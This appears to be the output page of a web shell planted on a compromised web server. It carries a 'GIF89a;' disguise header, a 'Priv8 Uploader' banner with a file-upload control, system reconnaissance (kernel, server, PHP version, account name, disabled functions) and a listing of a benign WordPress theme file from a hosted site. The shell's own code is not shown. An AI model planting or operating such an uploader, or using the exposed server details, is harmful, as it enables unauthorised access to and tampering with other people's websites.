GIF89a;

Priv8 Uploader By InMyMine7

Linux normalajans.net.tr 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021 x86_64
HEX
HEX
Server: Apache/2.4.58 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/1.1.1f
System: Linux normalajans.net.tr 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021 x86_64
User: selcukbaba70 (1002)
PHP: 8.2.15
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,system,passthru,shell_exec,proc_open,popen
Upload Files
File: /home/selcukbaba70/web/oadamlar.com.tr/public_html/wp-content/themes/jaxon/inc/Starter_Content.php
<?php
/**
 * Starter content.
 *
 * @author Themeisle
 * @package jaxon
 * @since 1.0.1
 */

namespace Jaxon;

/**
 * Class Starter Content
 *
 * @package fork
 */
class Starter_Content {
	const HOME_SLUG = 'home';
	const BLOG_SLUG = 'blog';

	/**
	 * Get the starter content.
	 *
	 * @return array
	 */
	public function get() {
		return array(
			'nav_menus' => array(
				'primary' => array(
					'items' => array(
						'home'      => array(
							'type'      => 'post_type',
							'object'    => 'page',
							'object_id' => '{{' . self::HOME_SLUG . '}}',
						),
						'page_blog' => array(
							'type'      => 'post_type',
							'object'    => 'page',
							'object_id' => '{{' . self::BLOG_SLUG . '}}',
						),
					),
				),
			),
			'options'   => array(
				'page_on_front'  => '{{' . self::HOME_SLUG . '}}',
				'page_for_posts' => '{{' . self::BLOG_SLUG . '}}',
				'show_on_front'  => 'page',
			),
			'posts'     => array(
				self::BLOG_SLUG => array(
					'post_name'  => self::BLOG_SLUG,
					'post_type'  => 'page',
					'post_title' => self::BLOG_SLUG,
				),
				self::HOME_SLUG => array(
					'post_type'    => 'page',
					'post_title'   => self::HOME_SLUG,
					'post_content' => '
					<!-- wp:paragraph {"align":"center"} -->
					<p class="has-text-align-center">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore.</p>
					<!-- /wp:paragraph -->
					',
				),
			),
		);
	}
}